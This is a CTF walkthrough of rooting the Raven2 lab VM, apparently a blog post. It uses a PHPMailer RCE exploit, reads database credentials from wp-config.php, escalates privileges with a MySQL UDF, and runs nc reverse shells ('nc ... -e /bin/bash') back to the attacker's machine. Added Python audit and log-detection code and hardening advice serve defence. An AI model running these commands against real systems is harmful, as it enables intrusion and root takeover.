RAVEN2

Author: Tess鱼丸 | Published: 2023-02-02 20:53

    1. Network scan

    ┌──(root㉿kali)-[~]
    └─# arp-scan -l
    Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
    Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
    192.168.10.1    00:50:56:ff:c4:ee       VMware, Inc.
    192.168.10.2    00:50:56:c0:00:08       VMware, Inc.
    192.168.10.11   00:0c:29:bb:da:1b       VMware, Inc.
    192.168.10.254  00:50:56:e2:68:c6       VMware, Inc.
    
    5 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.9.7: 256 hosts scanned in 1.986 seconds (128.90 hosts/sec). 4 responded
                                                                                      
    ┌──(root㉿kali)-[~]
    └─# 
                                                                                      
    ┌──(root㉿kali)-[~]
    └─# nmap -p- 192.168.10.11                                 
    Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-01 23:49 EST
    Nmap scan report for 192.168.10.11
    Host is up (0.00062s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT      STATE SERVICE
    22/tcp    open  ssh
    80/tcp    open  http
    111/tcp   open  rpcbind
    56088/tcp open  unknown
    MAC Address: 00:0C:29:BB:DA:1B (VMware)
                                                      
    

    2. Target port scan

    ┌──(root㉿kali)-[~]
    └─# nmap -p21,80,111,56088 -A 192.168.10.11
    Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-01 23:50 EST
    Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
    Service scan Timing: About 66.67% done; ETC: 23:50 (0:00:06 remaining)
    Nmap scan report for 192.168.10.11
    Host is up (0.00025s latency).
    
    PORT      STATE  SERVICE VERSION
    21/tcp    closed ftp
    80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
    |_http-title: Raven Security
    |_http-server-header: Apache/2.4.10 (Debian)
    111/tcp   open   rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          35577/tcp6  status
    |   100024  1          50705/udp   status
    |   100024  1          54800/udp6  status
    |_  100024  1          56088/tcp   status
    56088/tcp open   status  1 (RPC #100024)
    MAC Address: 00:0C:29:BB:DA:1B (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.25 ms 192.168.10.11
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds
    

    3. Web information gathering

    ┌──(root㉿kali)-[~]
    └─# dirsearch -u http://192.168.10.11
    
      _|. _ _  _  _  _ _|_    v0.4.2
     (_||| _) (/_(_|| (_| )
    
    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
    
    Output File: /root/.dirsearch/reports/192.168.10.11/_23-02-01_23-55-37.txt
    
    Error Log: /root/.dirsearch/logs/errors-23-02-01_23-55-37.log
    
    Target: http://192.168.10.11/
    
    [23:55:37] Starting: 
    [23:55:37] 301 -  311B  - /js  ->  http://192.168.10.11/js/                
    [23:55:37] 200 -   18KB - /.DS_Store                                       
    [23:55:38] 403 -  299B  - /.ht_wsr.txt                                     
    [23:55:38] 403 -  302B  - /.htaccess.bak1                                  
    [23:55:38] 403 -  302B  - /.htaccess.orig
    [23:55:38] 403 -  304B  - /.htaccess.sample
    [23:55:38] 403 -  302B  - /.htaccess.save
    [23:55:38] 403 -  300B  - /.htaccess_sc
    [23:55:38] 403 -  303B  - /.htaccess_extra
    [23:55:38] 403 -  300B  - /.htaccessBAK
    [23:55:38] 403 -  300B  - /.htaccessOLD
    [23:55:38] 403 -  302B  - /.htaccess_orig
    [23:55:38] 403 -  301B  - /.htaccessOLD2
    [23:55:38] 403 -  292B  - /.htm                                            
    [23:55:38] 403 -  293B  - /.html
    [23:55:38] 403 -  298B  - /.htpasswds
    [23:55:38] 403 -  302B  - /.htpasswd_test
    [23:55:38] 403 -  299B  - /.httr-oauth                                     
    [23:55:38] 403 -  292B  - /.php                                            
    [23:55:38] 403 -  293B  - /.php3
    [23:55:41] 200 -   13KB - /about.html                                       
    [23:55:47] 200 -    9KB - /contact.php                                      
    [23:55:47] 301 -  312B  - /css  ->  http://192.168.10.11/css/               
    [23:55:49] 301 -  314B  - /fonts  ->  http://192.168.10.11/fonts/           
    [23:55:50] 301 -  312B  - /img  ->  http://192.168.10.11/img/               
    [23:55:50] 200 -   16KB - /index.html                                       
    [23:55:51] 200 -    4KB - /js/                                              
    [23:55:52] 200 -  626B  - /manual/index.html                                
    [23:55:52] 301 -  315B  - /manual  ->  http://192.168.10.11/manual/
    [23:55:57] 403 -  301B  - /server-status                                    
    [23:55:57] 403 -  302B  - /server-status/                                   
    [23:56:00] 200 -    5KB - /vendor/             (the PATH file in this directory reveals flag1)
    [23:56:02] 200 -    2KB - /wordpress/wp-login.php                           
    [23:56:02] 200 -   51KB - /wordpress/                                       
                                                                                 
    Task Completed   
    

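    View the /wordpress page.

    The page does not render completely. Edit /etc/hosts and add the line

    192.168.10.11 raven.local

    so that the hostname resolves. After refreshing the page, it renders as a WordPress site.

    Next, scan the site directories once more: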

    ┌──(root㉿kali)-[~]
    └─# dirb http://192.168.10.11        
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    START_TIME: Thu Feb  2 00:05:22 2023
    URL_BASE: http://192.168.10.11/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    -----------------
    GENERATED WORDS: 4612                                                          
    
    ---- Entering directory: http://192.168.10.11/wordpress/wp-content/ ----
    + http://192.168.10.11/wordpress/wp-content/index.php (CODE:200|SIZE:0)          
    ==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/languages/              
    ==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/plugins/                
    ==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/themes/                 
    ==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/upgrade/                
    ==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/uploads/     (flag3 is here)
    
    
    Found flag3:
    flag3{a0f568aa9de277887f37730d71520d9b}

    Viewing the PATH file under /vendor gives the install path and the first flag, flag1:

    
    /var/www/html/vendor/
    flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
    

    Viewing SECURITY.md under /vendor reveals the vulnerability that is present:

    
    PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033]
    
    
    ┌──(root㉿kali)-[~/phpmailer]
    └─# searchsploit phpmailer
    ------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                   |  Path
    ------------------------------------------------------------------------------------------------- ---------------------------------
    PHPMailer 1.7 - 'Data()' Remote Denial of Service                                                | php/dos/25752.txt
    PHPMailer < 5.2.18 - Remote Code Execution                                                       | php/webapps/40968.sh
    PHPMailer < 5.2.18 - Remote Code Execution                                                       | php/webapps/40970.php
    PHPMailer < 5.2.18 - Remote Code Execution                                                       | php/webapps/40974.py
    PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)                                    | multiple/webapps/41688.rb
    PHPMailer < 5.2.20 - Remote Code Execution                                                       | php/webapps/40969.py
    PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnS | php/webapps/40986.py
    PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                         | php/webapps/42221.py
    PHPMailer < 5.2.21 - Local File Disclosure                                                       | php/webapps/43056.py
    WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)                      | php/remote/42024.rb
    ------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    
    ┌──(root㉿kali)-[~/phpmailer]
    └─# cp /usr/share/exploitdb/exploits/php/webapps/40974.py .
    ┌──(root㉿kali)-[~/phpmailer]
    └─# ls
     40974.py
    
    

    Modify the relevant region of the script

    Run it

    ┌──(root㉿kali)-[~/phpmailer]
    └─# python3 ./40974.py
    
    
     █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
    ██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
    ███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝
    ██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗
    ██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║
    ╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝
          PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com
     Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski
    
    [+] SeNdiNG eVIl SHeLL To TaRGeT....
    [+] SPaWNiNG eVIL sHeLL..... bOOOOM :D
    [+]  ExPLoITeD http://192.168.10.11/contact.php
                                                                                                                                       
    ┌──(root㉿kali)-[~/phpmailer]
    └─#                       
    
    

    Once the listener is running, the page can be visited in the browser

    ┌──(root㉿kali)-[~]
    └─# nc -lvnp 4444
    listening on [any] 4444 ...
    
    

    Visit it in the browser
    ┌──(root㉿kali)-[~]
    └─# nc -lvnp 4444
    listening on [any] 4444 ...
    connect to [192.168.10.100] from (UNKNOWN) [192.168.10.11] 37496
    /bin/sh: 0: can't access tty; job control turned off
    $ 
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ whoami
    www-data
    $ uname -a
    Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
    $ ps -aux |grep root
    
    

    First, set up an interactive shell

    $ python -c "import pty;pty.spawn('/bin/bash')"
    www-data@Raven:/var/www/html$ pwd
    pwd
    /var/www/html
    www-data@Raven:/var/www/html$ cd  wordpress
    cd  wordpress
    www-data@Raven:/var/www/html/wordpress$ ls -al
    ls -al
    ls -al
    total 204
    drwxrwxrwx  5 root     root      4096 Nov  9  2018 .
    drwxrwxrwx 10 root     root      4096 Feb  3 01:17 ..
    -rw-r--r--  1 www-data www-data   255 Aug 13  2018 .htaccess
    -rwxrwxrwx  1 root     root       418 Sep 25  2013 index.php
    -rwxrwxrwx  1 root     root     19935 Aug 13  2018 license.txt
    -rwxrwxrwx  1 root     root      7413 Aug 13  2018 readme.html
    -rwxrwxrwx  1 root     root      5447 Sep 27  2016 wp-activate.php
    drwxrwxrwx  9 root     root      4096 Jun 15  2017 wp-admin
    -rwxrwxrwx  1 root     root       364 Dec 19  2015 wp-blog-header.php
    -rwxrwxrwx  1 root     root      1627 Aug 29  2016 wp-comments-post.php
    -rwxrwxrwx  1 root     root      2853 Dec 16  2015 wp-config-sample.php
    -rw-rw-rw-  1 www-data www-data  3134 Aug 13  2018 wp-config.php   
    ^ note: this file's permissions are open to the low-privileged www-data user
    drwxrwxrwx  7 root     root      4096 Feb  3 01:04 wp-content
    -rwxrwxrwx  1 root     root      3286 May 24  2015 wp-cron.php
    drwxrwxrwx 18 root     root     12288 Jun 15  2017 wp-includes
    -rwxrwxrwx  1 root     root      2422 Nov 21  2016 wp-links-opml.php
    -rwxrwxrwx  1 root     root      3301 Oct 25  2016 wp-load.php
    -rwxrwxrwx  1 root     root     34337 Aug 13  2018 wp-login.php
    -rwxrwxrwx  1 root     root      8048 Jan 11  2017 wp-mail.php
    -rwxrwxrwx  1 root     root     16200 Apr  6  2017 wp-settings.php
    -rwxrwxrwx  1 root     root     29924 Jan 24  2017 wp-signup.php
    -rwxrwxrwx  1 root     root      4513 Oct 14  2016 wp-trackback.php
    -rwxrwxrwx  1 root     root      3065 Aug 31  2016 xmlrpc.php
    www-data@Raven:/var/www/html/wordpress$ 
    
    

    Take a look at it

    It actually contains the database username and the database password

    www-data@Raven:/var/www/html/wordpress$ cat wp-config.php
    cat wp-config.php
    <?php
    /**
     * The base configuration for WordPress
     *
     * The wp-config.php creation script uses this file during the
     * installation. You don't have to use the web site, you can
     * copy this file to "wp-config.php" and fill in the values.
     *
     * This file contains the following configurations:
     *
     * * MySQL settings
     * * Secret keys
     * * Database table prefix
     * * ABSPATH
     *
     * @link https://codex.wordpress.org/Editing_wp-config.php
     *
     * @package WordPress
     */
    
    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'wordpress');
    
    /** MySQL database username */
    define('DB_USER', 'root');
    // note: the database username is right here
    
    /** MySQL database password */
    define('DB_PASSWORD', 'R@v3nSecurity');
    // note: and so is the database password
    
    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8mb4');
    
    /** The Database Collate type. Don't change this if in doubt. */
    define('DB_COLLATE', '');
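
The listing above shows wp-config.php as -rw-rw-rw- with DB_USER set to root. The audit below is an added example, not part of the original write-up: it flags those two conditions and lists world-writable entries under a web root. The function names, the sample tree and the placeholder password are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Constructed sample with the same DB_* keys as the file shown above;
# the password is a placeholder.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'placeholder-password');
define('DB_HOST', 'localhost');
"""

DEFINE_RE = re.compile(r"define\(\s*['\"](DB_\w+)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)")


def audit_wp_config(path):
    """Return findings for one wp-config.php: file mode and DB account."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append("world-readable: every local account can read the DB password")
    if mode & stat.S_IWOTH:
        findings.append("world-writable: every local account can rewrite the config")
    with open(path, encoding="utf-8", errors="replace") as fh:
        settings = dict(DEFINE_RE.findall(fh.read()))
    if settings.get("DB_USER") == "root":
        findings.append("DB_USER is root: the site connects with full MySQL privileges")
    return findings


def world_writable(root):
    """Return sorted relative paths under root that have the other-write bit set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            # On Linux a symlink's own mode is always rwxrwxrwx, so skip links.
            if not stat.S_ISLNK(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def build_sample_root():
    """Create a constructed web root using modes seen in the ls -al output."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {"wp-config.php": 0o666, "index.php": 0o777, ".htaccess": 0o644}
    for name, mode in layout.items():
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_WP_CONFIG if name == "wp-config.php" else "")
        os.chmod(path, mode)
    return root


def audit_root(root):
    """Audit root/wp-config.php and list world-writable entries under root."""
    return audit_wp_config(os.path.join(root, "wp-config.php")), world_writable(root)


if __name__ == "__main__":
    cfg_findings, writable = audit_root(build_sample_root())
    for finding in cfg_findings:
        print("wp-config.php:", finding)
    for rel in writable:
        print("world-writable:", rel)
```
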
    
    

    Connect to the database

    www-data@Raven:/var/www/html/wordpress$ mysql -u root -p
    mysql -u root -p
    Enter password: R@v3nSecurity
    
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 37
    Server version: 5.5.60-0+deb8u1 (Debian)
    
    Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
    
    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    mysql> show databases;
    show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | mysql              |
    | performance_schema |
    | wordpress          |
    +--------------------+
    4 rows in set (0.00 sec)
    mysql> 
    
    

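    Privilege escalation through the MySQL database
    Method 1
    \! bash (runs from the mysql client; as the prompt below shows, the resulting shell is still www-data)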

    mysql> \! bash
    \! bash
    www-data@Raven:/var/www/html/wordpress$ 
    
    

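    Method 2
    Escalate with a UDF (user-defined function). Kali ships UDF shared libraries that can be used for this:
    the .dll files are for Windows systems, the .so files are for Linux systems,
    and sys_64 denotes the 64-bit version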

    ┌──(root㉿kali)-[~/phpmailer]
    └─# find / -iname "*mysqludf*" -type f 2>/dev/null
    
    /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
    /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
    /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
    /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
    /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
    /usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
    /usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
    /usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
    
    

    Copy the .so file and rename it to udf.so

    ┌──(root㉿kali)-[~/phpmailer]
    └─# cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so .
                                                                                                                                       
    ┌──(root㉿kali)-[~/phpmailer]
    └─# ls
    40974.py  lib_mysqludf_sys_64.so
    
    ┌──(root㉿kali)-[~/phpmailer]
    └─# mv lib_mysqludf_sys_64.so udf.so
                                                                                                                                       
    ┌──(root㉿kali)-[~/phpmailer]
    └─# ls
    40968.sh  40974.py  udf.so
    
    

    Transfer udf.so from the Kali attack machine to the /tmp directory on the target

    www-data@Raven:/var/www/html/wordpress$ cd /tmp
    cd /tmp
    www-data@Raven:/tmp$ 
    www-data@Raven:/tmp$ nc -nvlp 4444 > udf.so
    nc -nvlp 4444 > udf.so
    listening on [any] 4444 ...
    connect to [192.168.10.11] from (UNKNOWN) [192.168.10.100] 47720
    www-data@Raven:/tmp$ 
    
    Switch to Kali
    ┌──(root㉿kali)-[~/phpmailer]
    └─# nc 192.168.10.11 4444 < udf.so -w 1
    
    Target
    www-data@Raven:/tmp$ ls
    ls
    abc.txt  udf.so
    
    

    The .so file has to be placed in the plugin directory, /usr/lib/mysql/plugin/

    mysql> show variables like '%plugin%';
    show variables like '%plugin%';
    +---------------+------------------------+
    | Variable_name | Value                  |
    +---------------+------------------------+
    | plugin_dir    | /usr/lib/mysql/plugin/ |
    +---------------+------------------------+
    1 row in set (0.00 sec)
    
    mysql> 
    

    Create a table named yyf

    mysql> create table yyf(line blob);
    create table yyf(line blob);
    Query OK, 0 rows affected (0.00 sec)
    
    

    Load the contents of udf.so into the yyf table

    mysql> insert into yyf values(load_file('/tmp/udf.so'));
    insert into yyf values(load_file('/tmp/udf.so'));
    Query OK, 1 row affected (0.00 sec)
    
    

    Then dump the contents into a plugin file named yyf.so

    mysql> select * from yyf into dumpfile '/usr/lib/mysql/plugin/yyf.so';
    select * from yyf into dumpfile '/usr/lib/mysql/plugin/yyf.so';
    Query OK, 1 row affected (0.00 sec)
    
    

    Load the .so file and create a function that can invoke system commands

    mysql> create function sys_exec returns integer soname 'yyf.so';
    create function sys_exec returns integer soname 'yyf.so';
    Query OK, 0 rows affected (0.00 sec)
    
    

    Test that the sys_exec function works

    mysql> select sys_exec('id>/tmp/abc.txt');
    select sys_exec('id>/tmp/abc.txt');
    +-----------------------------+
    | sys_exec('id>/tmp/abc.txt') |
    +-----------------------------+
    |                           0 |
    +-----------------------------+
    1 row in set (0.00 sec)
    
    
    At this point abc.txt has been created in /tmp, and it was created by root
    www-data@Raven:/tmp$ ls -l
    ls -l
    total 12
    -rw-rw---- 1 root     root       39 Feb  3 22:44 abc.txt
    -rw-r--r-- 1 www-data www-data 8040 Feb  3 22:33 udf.so
    www-data@Raven:/tmp$ 
    
    

    Run a reverse-shell command through the function

    Kali
    ┌──(root㉿kali)-[~]
    └─# nc -nvlp 5555
    listening on [any] 5555 ...
    
    Target
    mysql> select sys_exec('nc 192.168.10.100 5555 -e /bin/bash');
    select sys_exec('nc 192.168.10.100 5555 -e /bin/bash');
    
    
    Switch to Kali
    ┌──(root㉿kali)-[~]
    └─# nc -nvlp 5555
    listening on [any] 5555 ...
    connect to [192.168.10.100] from (UNKNOWN) [192.168.10.11] 50015
    id
    uid=0(root) gid=0(root) groups=0(root)
    whoami
    root
    
    
    
    After the Kali side disconnects, MySQL on the target prints the following
    +-------------------------------------------------+
    | sys_exec('nc 192.168.10.100 5555 -e /bin/bash') |
    +-------------------------------------------------+
    |                                               0 |
    +-------------------------------------------------+
    1 row in set (21.27 sec)
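
The statement sequence above (LOAD_FILE into a blob, INTO DUMPFILE under plugin_dir, CREATE FUNCTION ... SONAME, then a call to the new function) leaves a recognisable trail in MySQL query logging. The detector below is an added example, not part of the original write-up: it replays constructed log lines built from the statements shown on this page. The simplified log layout, the function names and connection 41 are assumptions made for illustration.

```python
import posixpath
import re

# Constructed log lines in a simplified "<connection id> Query <statement>" layout.
# The statements are the ones typed in the session above; connection 41 is benign.
SAMPLE_LOG = """\
37 Query show variables like '%plugin%'
37 Query create table yyf(line blob)
37 Query insert into yyf values(load_file('/tmp/udf.so'))
37 Query select * from yyf into dumpfile '/usr/lib/mysql/plugin/yyf.so'
37 Query create function sys_exec returns integer soname 'yyf.so'
37 Query select sys_exec('id>/tmp/abc.txt')
41 Query select post_title from wp_posts where ID = 1
"""

PLUGIN_DIR = "/usr/lib/mysql/plugin/"  # plugin_dir value reported on this host

LINE_RE = re.compile(r"^\s*(\d+)\s+Query\s+(.*)$", re.I)
LOAD_FILE_RE = re.compile(r"\bload_file\s*\(", re.I)
FILE_WRITE_RE = re.compile(r"\binto\s+(?:dumpfile|outfile)\s+'([^']+)'", re.I)
CREATE_UDF_RE = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'",
    re.I,
)


def detect_udf_abuse(log_text, plugin_dir=PLUGIN_DIR):
    """Return (connection_id, alert) tuples describing UDF plugin-drop activity."""
    plugin_dir = posixpath.normpath(plugin_dir)
    alerts = []
    dropped = {}   # connection id -> library names it wrote into plugin_dir
    udfs = set()   # lower-cased names registered with CREATE FUNCTION ... SONAME
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a Query line
        conn, stmt = int(m.group(1)), m.group(2)
        if LOAD_FILE_RE.search(stmt):
            alerts.append((conn, "LOAD_FILE() read of a server-side file"))
        write = FILE_WRITE_RE.search(stmt)
        if write:
            # Normalise so '/plugin/../plugin/x.so' style paths are still caught.
            target = posixpath.normpath(write.group(1))
            if posixpath.dirname(target) == plugin_dir:
                dropped.setdefault(conn, set()).add(posixpath.basename(target))
                alerts.append((conn, "file written into plugin_dir: " + target))
        created = CREATE_UDF_RE.search(stmt)
        if created:
            func, lib = created.group(1), created.group(2)
            udfs.add(func.lower())
            # A library this same connection just wrote completes the chain.
            level = "HIGH" if lib in dropped.get(conn, ()) else "MEDIUM"
            alerts.append((conn, "%s: UDF %s registered from %s" % (level, func, lib)))
            continue
        for func in sorted(udfs):
            if re.search(r"\b%s\s*\(" % re.escape(func), stmt, re.I):
                alerts.append((conn, "UDF %s invoked" % func))
    return alerts


if __name__ == "__main__":
    for conn, alert in detect_udf_abuse(SAMPLE_LOG):
        print("conn %d: %s" % (conn, alert))
```

The chain only reaches root here because abc.txt shows mysqld itself running as root. Running mysqld under an unprivileged account, giving the web application a non-root database user without the FILE privilege, and setting secure_file_priv to restrict LOAD_FILE() and SELECT ... INTO file operations each break a step of it.
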
    
    

    flag1 and flag3 were found earlier; now locate the remaining flags

    find / -iname "*flag*" 2>/dev/null
    /proc/kpageflags
    /proc/sys/kernel/acpi_video_flags
    /var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
    /var/www/html/wordpress/wp-includes/images/icon-pointer-flag-2x.png
    /var/www/html/wordpress/wp-includes/images/icon-pointer-flag.png
    /var/www/flag2.txt
    /var/lib/mysql/debian-5.5.flag
    /root/flag4.txt
    /usr/include/x86_64-linux-gnu/asm/processor-flags.h
    /usr/include/x86_64-linux-gnu/bits/waitflags.h
    /usr/include/linux/kernel-page-flags.h
    /usr/include/linux/tty_flags.h
    /usr/lib/x86_64-linux-gnu/perl/5.20.2/bits/waitflags.ph
    /usr/share/man/man3/fesetexceptflag.3.gz
    /usr/share/man/man3/fegetexceptflag.3.gz
    /usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
    /usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
    /sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
    /sys/devices/virtual/net/lo/flags
    /sys/devices/platform/serial8250/tty/ttyS0/flags
    /sys/devices/platform/serial8250/tty/ttyS1/flags
    /sys/devices/platform/serial8250/tty/ttyS2/flags
    /sys/devices/platform/serial8250/tty/ttyS3/flags
    /sys/kernel/debug/tracing/events/power/pm_qos_update_flags
    /sys/module/scsi_mod/parameters/default_dev_flags
    
    
    
    
    cat /var/www/flag2.txt
    flag2{6a8ed560f0b5358ecf844108048eb337}
    
    cat /root/flag4.txt
      ___                   ___ ___ 
     | _ \__ ___ _____ _ _ |_ _|_ _|
     |   / _` \ V / -_) ' \ | | | | 
     |_|_\__,_|\_/\___|_||_|___|___|
                               
    flag4{df2bc5e951d91581467bb9a2a8ff4425}
    
    CONGRATULATIONS on successfully rooting RavenII
    
    I hope you enjoyed this second interation of the Raven VM
    
    Hit me up on Twitter and let me know what you thought: 
    
    @mccannwj / wjmccann.github.io
    
    

    OK, done~~~

          Article title: RAVEN2

          Article link: https://www.haomeiwen.com/subject/pajihdtx.html